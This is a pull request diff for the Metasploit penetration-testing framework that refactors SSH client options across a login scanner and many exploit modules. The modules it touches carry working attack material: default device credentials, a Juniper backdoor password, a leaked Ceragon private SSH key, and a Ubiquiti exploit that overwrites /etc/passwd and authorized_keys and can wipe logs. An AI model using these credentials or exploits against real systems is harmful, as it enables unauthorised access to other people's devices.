### PR TITLE
Making SSH defaults widely used 

### DIFF
--- a/lib/metasploit/framework/login_scanner/ssh.rb
+++ b/lib/metasploit/framework/login_scanner/ssh.rb
@@ -13,7 +13,7 @@ module Metasploit
       #
       class SSH
         include Metasploit::Framework::LoginScanner::Base
-
+        include Msf::Exploit::Remote::SSH
         #
         # CONSTANTS
         #
@@ -52,16 +52,10 @@ module Metasploit
         # @note The caller *must* close {#ssh_socket}
         def attempt_login(credential)
           self.ssh_socket = nil
-          factory = Rex::Socket::SSHFactory.new(framework,framework_module, proxies)
-          opt_hash = {
+          opt_hash = ssh_client_defaults.merge({
             :port            => port,
-            :use_agent       => false,
-            :config          => false,
-            :verbose         => verbosity,
-            :proxy           => factory,
-            :non_interactive => true,
-            :verify_host_key => :never
-          }
+            :verbose         => verbosity
+          })
           case credential.private_type
           when :password, nil
             opt_hash.update(
@@ -88,8 +82,11 @@ module Metasploit
             end
           rescue OpenSSL::Cipher::CipherError, ::EOFError, Net::SSH::Disconnect, Rex::ConnectionError, ::Timeout::Error, Errno::ECONNRESET => e
             result_options.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e)
-          rescue Net::SSH::Exception
-            result_options.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: e)
+          rescue Net::SSH::Exception => e
+            status = Metasploit::Model::Login::Status::INCORRECT
+            status = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT if e.message.split("\n").first == 'could not settle on kex algorithm'
+
+            result_options.merge!(status: status, proof: e)
           end
 
           unless result_options.has_key? :status

--- a/lib/msf/core/exploit/remote/ssh.rb
+++ b/lib/msf/core/exploit/remote/ssh.rb
@@ -20,7 +20,13 @@ module Msf::Exploit::Remote::SSH
   include Msf::Exploit::Remote::SSH::Options
 
   def ssh_socket_factory
+
+    unless datastore
+      return Rex::Socket::SSHFactory.new(framework, self, proxies)
+    end
+
     Rex::Socket::SSHFactory.new(framework, self, datastore['Proxies'])
+
   end
 
   def ssh_client_defaults

--- a/lib/msf/core/exploit/remote/ssh.rb
+++ b/lib/msf/core/exploit/remote/ssh.rb
@@ -12,7 +12,6 @@ require 'rex/socket/ssh_factory'
 require 'msf/core/exploit/remote/ssh/auth_methods'
 
 module Msf::Exploit::Remote::SSH
-
   # Register SSH datastore options:
   #   SSH_IDENT   (TODO: Refactor to SSHIdent)
   #   SSH_TIMEOUT (TODO: Refactor to SSHTimeout)
@@ -20,13 +19,11 @@ module Msf::Exploit::Remote::SSH
   include Msf::Exploit::Remote::SSH::Options
 
   def ssh_socket_factory
-
-    unless datastore
+    unless defined? datastore
       return Rex::Socket::SSHFactory.new(framework, self, proxies)
     end
 
     Rex::Socket::SSHFactory.new(framework, self, datastore['Proxies'])
-
   end
 
   def ssh_client_defaults
@@ -38,5 +35,4 @@ module Msf::Exploit::Remote::SSH
       proxy: ssh_socket_factory
     }
   end
-
 end

--- a/lib/msf/core/exploit/remote/ssh.rb
+++ b/lib/msf/core/exploit/remote/ssh.rb
@@ -32,7 +32,8 @@ module Msf::Exploit::Remote::SSH
       config: false,
       use_agent: false,
       verify_host_key: :never,
-      proxy: ssh_socket_factory
+      proxy: ssh_socket_factory,
+      append_all_supported_algorithms: true
     }
   end
 end

--- a/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb
+++ b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb
@@ -63,17 +63,11 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def do_login(user, pass, ip)
-    factory = ssh_socket_factory
-    opts = {
+    opts = ssh_client_defaults.merge({
       :auth_methods    => ['password'],
       :port            => rport,
-      :config          => false,
-      :use_agent       => false,
       :password        => pass,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+    })
 
     opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 

--- a/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb
+++ b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb
@@ -105,7 +105,7 @@ class MetasploitModule < Msf::Auxiliary
     print_status("#{ip}:#{rport} - Attempt to login...")
     ssh = do_login(username, password, ip)
     if ssh
-      output = ssh.exec!("shell:exec #{cmd}\n").to_s
+      output = ssh.exec!("#{cmd}\n").to_s
       if output
         print_good("#{ip}:#{rport} - Command successfully executed.  Output: #{output}")
         store_loot("apache.karaf.command",

--- a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
@@ -46,27 +46,23 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(ip)
-    factory = ssh_socket_factory
 
     # Specified Kex/Encryption downgrade requirements must be set to connect to the Power Meters.
-    ssh_opts = {
+    ssh_opts = ssh_client_defaults.merge({
       auth_methods:    ['publickey'],
       port:            rport,
-      key_data:        [ key_data ],
+      key_data:        key_data,
       hmac:            ['hmac-sha1'],
       encryption:      ['aes128-cbc'],
       kex:             ['diffie-hellman-group1-sha1'],
-      host_key:        ['ssh-rsa'],
-      use_agent:       false,
-      config:          false,
-      proxy:           factory
-    }
+      host_key:        ['ssh-rsa']
+    })
 
     ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
     begin
       ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
-        Net::SSH.start(ip, 'admin', ssh_opts)
+        Net::SSH.start(ip, 'bob', ssh_opts)
       end
     rescue Net::SSH::Exception => e
       vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")

--- a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
     ssh_opts = ssh_client_defaults.merge({
       auth_methods:    ['publickey'],
       port:            rport,
-      key_data:        key_data,
+      key_data:        [ key_data ],
       hmac:            ['hmac-sha1'],
       encryption:      ['aes128-cbc'],
       kex:             ['diffie-hellman-group1-sha1'],
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Auxiliary
 
     begin
       ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
-        Net::SSH.start(ip, 'bob', ssh_opts)
+        Net::SSH.start(ip, 'admin', ssh_opts)
       end
     rescue Net::SSH::Exception => e
       vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")

--- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
@@ -44,17 +44,12 @@ class MetasploitModule < Msf::Auxiliary
   def run_host(ip)
     factory = ssh_socket_factory
 
-    ssh_opts = {
+    ssh_opts = ssh_client_defaults.merge({
       port:            rport,
       # The auth method is converted into a class name for instantiation,
       # so fortinet-backdoor here becomes FortinetBackdoor from the mixin
-      auth_methods:    ['fortinet-backdoor'],
-      non_interactive: true,
-      config:          false,
-      use_agent:       false,
-      verify_host_key: :never,
-      proxy:           factory
-    }
+      auth_methods:    ['fortinet-backdoor']
+    })
 
     ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 

--- a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb
@@ -41,15 +41,11 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(ip)
-    factory = ssh_socket_factory
-    ssh_opts = {
+    ssh_opts = ssh_client_defaults.merge({
       :port            => rport,
       :auth_methods    => ['password', 'keyboard-interactive'],
       :password        => %q{<<< %s(un='%s') = %u},
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+    })
 
     ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 

--- a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
+++ b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
@@ -81,19 +81,12 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::BadConfig, 'Execute action requires CMD to be set')
     end
 
-    factory = ssh_socket_factory
-
-    ssh_opts = {
+    ssh_opts = ssh_client_defaults.merge({
       port:            rport,
       # The auth method is converted into a class name for instantiation,
       # so libssh-auth-bypass here becomes LibsshAuthBypass from the mixin
-      auth_methods:    ['libssh-auth-bypass'],
-      non_interactive: true,
-      config:          false,
-      use_agent:       false,
-      verify_host_key: :never,
-      proxy:           factory
-    }
+      auth_methods:    ['libssh-auth-bypass']
+    })
 
     ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 

--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -137,14 +137,9 @@ class MetasploitModule < Msf::Auxiliary
   def check_user(ip, user, port)
     technique = action['Type']
 
-    opts = {
-      port: port,
-      use_agent: false,
-      config: false,
-      proxy: ssh_socket_factory,
-      non_interactive: true,
-      verify_host_key: :never
-    }
+    opts = ssh_client_defaults.merge({
+      port: port
+    })
 
     # The auth method is converted into a class name for instantiation,
     # so malformed-packet here becomes MalformedPacket from the mixin

--- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
+++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
@@ -11,43 +11,47 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::SSH
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Apple iOS Default SSH Password Vulnerability",
-      'Description'    => %q{
-        This module exploits the default credentials of Apple iOS when it
-        has been jailbroken and the passwords for the 'root' and 'mobile'
-        users have not been changed.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apple iOS Default SSH Password Vulnerability',
+        'Description' => %q{
+          This module exploits the default credentials of Apple iOS when it
+          has been jailbroken and the passwords for the 'root' and 'mobile'
+          users have not been changed.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'hdm'
         ],
-      'References'     =>
-        [
+        'References' => [
           ['OSVDB', '61284']
         ],
-      'DefaultOptions'  =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'thread'
         },
-      'Payload'        =>
-        {
+        'Payload' => {
           'Compat' => {
-            'PayloadType'    => 'cmd_interact',
+            'PayloadType' => 'cmd_interact',
             'ConnectionType' => 'find'
           }
         },
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
-      'Targets'        =>
-        [
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Targets' => [
           ['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ],
         ],
-      'Privileged'     => true,
-      'DisclosureDate' => '2007-07-02',
-      'DefaultTarget'  => 0))
+        'Privileged' => true,
+        'DisclosureDate' => '2007-07-02',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -72,21 +76,18 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['RHOST']
   end
 
-
   def rport
     datastore['RPORT']
   end
 
-
   def do_login(user, pass)
-    
     opts = ssh_client_defaults.merge({
-      :auth_methods    => ['password', 'keyboard-interactive'],
-      :port            => rport,
-      :password        => pass
+      auth_methods: ['password', 'keyboard-interactive'],
+      port: rport,
+      password: pass
     })
 
-    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
     begin
       ssh = nil
@@ -117,17 +118,16 @@ class MetasploitModule < Msf::Exploit::Remote
     return nil
   end
 
-
   def exploit
-    self.target['accounts'].each do |info|
-      user,pass = info
+    target['accounts'].each do |info|
+      user, pass = info
       print_status("#{rhost}:#{rport} - Attempt to login as '#{user}' with password '#{pass}'")
       conn = do_login(user, pass)
-      if conn
-        print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})")
-        handler(conn.lsock)
-        break
-      end
+      next unless conn
+
+      print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})")
+      handler(conn.lsock)
+      break
     end
   end
 end

--- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
+++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
@@ -79,17 +79,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def do_login(user, pass)
-    factory = ssh_socket_factory
-    opts = {
+    
+    opts = ssh_client_defaults.merge({
       :auth_methods    => ['password', 'keyboard-interactive'],
       :port            => rport,
-      :use_agent       => false,
-      :config          => false,
-      :password        => pass,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+      :password        => pass
+    })
 
     opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
 

--- a/modules/exploits/linux/http/alienvault_exec.rb
+++ b/modules/exploits/linux/http/alienvault_exec.rb
@@ -295,16 +295,11 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # We will trigger the rogue policy by doing ssh auth attempt with invalid credential :-)
-    factory = ssh_socket_factory
-    opts = {
+    opts = ssh_client_defaults.merge({
       auth_methods: ['password'],
       port: 22,
-      use_agent: false,
-      config: false,
-      password: rand_text_alpha(15),
-      proxy: factory,
-      non_interactive: true
-    }
+      password: rand_text_alpha(15)
+    })
 
     print_status("Triggering the policy by performing SSH login attempt")
 

--- a/modules/exploits/linux/http/cisco_firepower_useradd.rb
+++ b/modules/exploits/linux/http/cisco_firepower_useradd.rb
@@ -74,13 +74,13 @@ class MetasploitModule < Msf::Exploit::Remote
       vprint_status("Console is found.")
       vprint_status("Checking SSH service.")
       begin
+        opts = ssh_client_defaults.merge({
+          port: datastore['SSHPORT'],
+          password: Rex::Text.rand_text_alpha(5),
+          auth_methods: ['password']
+        })
         ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
-          Net::SSH.start(rhost, 'admin',
-            port: datastore['SSHPORT'],
-            password: Rex::Text.rand_text_alpha(5),
-            auth_methods: ['password'],
-            non_interactive: true
-          )
+          Net::SSH.start(rhost, 'admin', opts)
         end
       rescue Timeout::Error
         vprint_error('The SSH connection timed out.')

--- a/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb
+++ b/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb
@@ -18,44 +18,47 @@ class MetasploitModule < Msf::Exploit::Remote
   moved_from 'exploit/linux/ssh/ubiquiti_airos_file_upload'
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'               => 'Ubiquiti airOS Arbitrary File Upload',
-      'Description'        => %q{
-        This module exploits a pre-auth file upload to install a new root user
-        to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys.
+    super(
+      update_info(
+        info,
+        'Name' => 'Ubiquiti airOS Arbitrary File Upload',
+        'Description' => %q{
+          This module exploits a pre-auth file upload to install a new root user
+          to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys.
 
-        FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten.
-        /etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true.
+          FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten.
+          /etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true.
 
-        This method is used by the "mf" malware infecting these devices.
-      },
-      'Author'             => [
-        '93c08539', # Vulnerability discovery
-        'wvu'       # Metasploit module
-      ],
-      'References'         => [
-        %w{EDB 39701},
-        %w{URL https://hackerone.com/reports/73480}
-      ],
-      'DisclosureDate'     => '2016-02-13',
-      'License'            => MSF_LICENSE,
-      'Platform'           => 'unix',
-      'Arch'               => ARCH_CMD,
-      'Privileged'         => true,
-      'Payload'            => {
-        'Compat'           => {
-          'PayloadType'    => 'cmd_interact',
-          'ConnectionType' => 'find'
+          This method is used by the "mf" malware infecting these devices.
+        },
+        'Author' => [
+          '93c08539', # Vulnerability discovery
+          'wvu'       # Metasploit module
+        ],
+        'References' => [
+          %w[EDB 39701],
+          %w[URL https://hackerone.com/reports/73480]
+        ],
+        'DisclosureDate' => '2016-02-13',
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Privileged' => true,
+        'Payload' => {
+          'Compat' => {
+            'PayloadType' => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
+        'Targets' => [
+          ['Ubiquiti airOS < 5.6.2', {}]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true
         }
-      },
-      'Targets'            => [
-        ['Ubiquiti airOS < 5.6.2', {}]
-      ],
-      'DefaultTarget'      => 0,
-      'DefaultOptions'     => {
-        'SSL'              => true
-      }
-    ))
+      )
+    )
 
     register_options([
       Opt::RPORT(443),
@@ -64,9 +67,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_advanced_options([
       OptBool.new('PERSIST_ETC', [false, 'Persist in /etc/persistent', false]),
-      OptBool.new('WIPE_LOGS',   [false, 'Wipe /var/log/messages', false]),
-      OptBool.new('SSH_DEBUG',   [false, 'SSH debugging', false]),
-      OptInt.new('SSH_TIMEOUT',  [false, 'SSH timeout', 10])
+      OptBool.new('WIPE_LOGS', [false, 'Wipe /var/log/messages', false]),
+      OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]),
+      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])
     ])
   end
 
@@ -103,9 +106,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi(
       'method' => 'POST',
-      'uri'    => '/login.cgi',
-      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
-      'data'   => mime.to_s
+      'uri' => '/login.cgi',
+      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+      'data' => mime.to_s
     )
   end
 
@@ -117,18 +120,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi(
       'method' => 'POST',
-      'uri'    => '/login.cgi',
-      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
-      'data'   => mime.to_s
+      'uri' => '/login.cgi',
+      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+      'data' => mime.to_s
     )
   end
 
   def ssh_login
-    
     ssh_opts = ssh_client_defaults.merge({
-      port:            datastore['SSH_PORT'],
-      auth_methods:    %w{publickey password},
-      key_data:        [private_key]
+      port: datastore['SSH_PORT'],
+      auth_methods: %w[publickey password],
+      key_data: [private_key]
     })
 
     ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
@@ -145,13 +147,13 @@ class MetasploitModule < Msf::Exploit::Remote
     if ssh
       report_vuln(
         host: rhost,
-        name: self.name,
-        refs: self.references,
+        name: name,
+        refs: references,
         info: ssh.transport.server_version.version
       )
       store_valid_credential(
-        user:         username,
-        private:      private_key,
+        user: username,
+        private: private_key,
         private_type: :ssh_key
       )
       return Net::SSH::CommandStream.new(ssh)
@@ -163,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # This is for store_valid_credential above
   def service_details
     super.merge(
-      port:         datastore['SSH_PORT'],
+      port: datastore['SSH_PORT'],
       service_name: 'ssh'
     )
   end
@@ -180,9 +182,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi(
       'method' => 'POST',
-      'uri'    => '/login.cgi',
-      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
-      'data'   => mime.to_s
+      'uri' => '/login.cgi',
+      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+      'data' => mime.to_s
     )
 
     # http://www.hwmn.org/w/Ubiquity_HOWTO
@@ -245,9 +247,9 @@ class MetasploitModule < Msf::Exploit::Remote
   #
 
   def rc_poststart
-    <<EOF
-cp /etc/persistent/#{username}/passwd /etc/passwd
-cp /etc/persistent/#{username}/authorized_keys /etc/dropbear/authorized_keys
-EOF
+    <<~EOF
+      cp /etc/persistent/#{username}/passwd /etc/passwd
+      cp /etc/persistent/#{username}/authorized_keys /etc/dropbear/authorized_keys
+    EOF
   end
 end

--- a/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb
+++ b/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb
@@ -124,18 +124,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def ssh_login
-    factory = ssh_socket_factory
-
-    ssh_opts = {
+    
+    ssh_opts = ssh_client_defaults.merge({
       port:            datastore['SSH_PORT'],
       auth_methods:    %w{publickey password},
-      key_data:        [private_key],
-      non_interactive: true,
-      config:          false,
-      use_agent:       false,
-      verify_host_key: :never,
-      proxy:           factory
-    }
+      key_data:        [private_key]
+    })
 
     ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 

--- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
+++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
@@ -8,44 +8,52 @@ require 'net/ssh/command_stream'
 
 class MetasploitModule < Msf::Exploit::Remote
   include Msf::Auxiliary::Report
-    include Msf::Exploit::Remote::SSH
+  include Msf::Exploit::Remote::SSH
 
   Rank = ExcellentRanking
 
   def initialize(info = {})
-    super(update_info(info, {
-      'Name'        => 'Ceragon FibeAir IP-10 SSH Private Key Exposure',
-      'Description' => %q{
-        Ceragon ships a public/private key pair on FibeAir IP-10 devices
-        that allows passwordless authentication to any other IP-10 device.
-        Since the key is easily retrievable, an attacker can use it to
-        gain unauthorized remote access as the "mateidu" user.
-      },
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Privileged'  => false,
-      'Targets'     => [ [ "Universal", {} ] ],
-      'Payload'     =>
+    super(
+      update_info(
+        info,
         {
-          'Compat'  => {
-            'PayloadType'    => 'cmd_interact',
-            'ConnectionType' => 'find',
+          'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure',
+          'Description' => %q{
+            Ceragon ships a public/private key pair on FibeAir IP-10 devices
+            that allows passwordless authentication to any other IP-10 device.
+            Since the key is easily retrievable, an attacker can use it to
+            gain unauthorized remote access as the "mateidu" user.
           },
-        },
-      'Author'      => [
-        'hdm', # Discovery
-        'todb' # Metasploit module and advisory text (mostly copy-paste)
-        ],
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          ['CVE', '2015-0936'],
-          ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
-        ],
-      'DisclosureDate' => '2015-04-01', # Not a joke
-      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
-      'DefaultTarget' => 0
-    }))
+          'Platform' => 'unix',
+          'Arch' => ARCH_CMD,
+          'Privileged' => false,
+          'Targets' => [ [ 'Universal', {} ] ],
+          'Payload' => {
+            'Compat' => {
+              'PayloadType' => 'cmd_interact',
+              'ConnectionType' => 'find'
+            }
+          },
+          'Author' => [
+            'hdm', # Discovery
+            'todb' # Metasploit module and advisory text (mostly copy-paste)
+          ],
+          'License' => MSF_LICENSE,
+          'References' => [
+            ['CVE', '2015-0936'],
+            ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
+          ],
+          'DisclosureDate' => '2015-04-01', # Not a joke
+          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+          'DefaultTarget' => 0,
+          'Notes' => {
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => []
+          }
+        }
+      )
+    )
 
     register_options(
       [
@@ -61,24 +69,24 @@ class MetasploitModule < Msf::Exploit::Remote
         OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
       ]
     )
-
   end
 
   # helper methods that normally come from Tcp
   def rhost
     datastore['RHOST']
   end
+
   def rport
     datastore['RPORT']
   end
 
   def do_login(user)
     opt_hash = ssh_client_defaults.merge({
-      :auth_methods    => ['publickey'],
-      :port            => rport,
-      :key_data        => [ key_data ]
+      auth_methods: ['publickey'],
+      port: rport,
+      key_data: [ key_data ]
     })
-    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']
     begin
       ssh_socket = nil
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
@@ -113,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    conn = do_login("mateidu")
+    conn = do_login('mateidu')
     if conn
       print_good "#{rhost}:#{rport} - Successful login"
       handler(conn.lsock)
@@ -121,23 +129,22 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def key_data
-    <<EOF
------BEGIN RSA PRIVATE KEY-----
-MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr
-MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+
-IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB
-gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3
-CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv
-4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY
-SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6
-B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV
-93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc
-WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP
-YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll
-7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT
-uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg==
------END RSA PRIVATE KEY-----
-EOF
+    <<~EOF
+      -----BEGIN RSA PRIVATE KEY-----
+      MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr
+      MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+
+      IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB
+      gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3
+      CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv
+      4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY
+      SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6
+      B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV
+      93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc
+      WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP
+      YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll
+      7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT
+      uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg==
+      -----END RSA PRIVATE KEY-----
+    EOF
   end
 end
-

--- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
+++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
@@ -8,6 +8,7 @@ require 'net/ssh/command_stream'
 
 class MetasploitModule < Msf::Exploit::Remote
   include Msf::Auxiliary::Report
+    include Msf::Exploit::Remote::SSH
 
   Rank = ExcellentRanking
 
@@ -72,17 +73,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def do_login(user)
-    factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies'])
-    opt_hash = {
+    opt_hash = ssh_client_defaults.merge({
       :auth_methods    => ['publickey'],
       :port            => rport,
-      :key_data        => [ key_data ],
-      :use_agent       => false,
-      :config          => false,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+      :key_data        => [ key_data ]
+    })
     opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
     begin
       ssh_socket = nil

--- a/modules/exploits/linux/ssh/cisco_ucs_scpuser.rb
+++ b/modules/exploits/linux/ssh/cisco_ucs_scpuser.rb
@@ -11,57 +11,60 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::SSH
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Cisco UCS Director default scpuser password",
-      'Description'    => %q{
-        This module abuses a known default password on Cisco UCS Director. The 'scpuser'
-        has the password of 'scpuser', and allows an attacker to login to the virtual appliance
-        via SSH.
-        This module  has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
-        Note that Cisco also mentions in their advisory that their IMC Supervisor and
-        UCS Director Express are also affected by these vulnerabilities, but this module
-        was not tested with those products.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
